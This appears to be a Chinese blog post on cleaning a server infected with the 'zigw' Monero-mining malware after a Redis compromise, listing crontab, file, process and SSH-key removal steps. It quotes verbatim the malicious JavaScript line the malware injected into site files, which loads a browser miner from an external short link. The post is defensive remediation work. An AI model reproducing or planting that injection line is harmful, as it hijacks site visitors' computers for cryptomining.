最新文章:

首页 信息安全

zigw门罗币挖矿病毒查杀

发布时间:2018年12月07日 评论数:抢沙发 阅读数:66

    1.jpg


    该病毒定时任务是写进了文件:/var/spool/cron/root,需要对应删除里面的内容。

    然后要删除病毒的启动脚本:
    chattr -i /etc/shz.sh
    rm /etc/shz.sh


    找到病毒的主进程(找到主进程的方式和之前也差不多,找 CPU 占用率最高的进程就可以了。),并停掉:
    kill -9 27126


    删除主进程的配置文件和可执行文件:

    chattr -i /etc/conf.json  /etc/zigw
    rm /etc/conf.json
    rm /etc/zigw


    删除其他病毒添加的文件:
    rm /etc/conf.n
    rm /etc/zaker

    删除ssh秘钥
    cd /root/.ssh 
    rm authorize_keys

    删除/tmp目录下的一些残留文件

    然后还要清理全站js文件的尾部
    document.write(‘<script src=”http://t.cn/EvlonFh“></script><script>OMINEId(“e02cf4ce91284dab9bc3fc4cc2a65e28″,”-1″)</script>’);
    这里被全站插入网页挖矿JS脚本。

    刚刚安装完redis启动,就被入侵了。。。建议先配置好再启动

    附上病毒分析链接:

    https://www.freebuf.com/articles/system/186743.html

    http://www.xzeu.com/index.php/archives/120/

二维码加载中...
本文作者:Mr.linus      文章标题: zigw门罗币挖矿病毒查杀
本文地址:https://www.itsec.vip/527  百度暂未收录本文
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论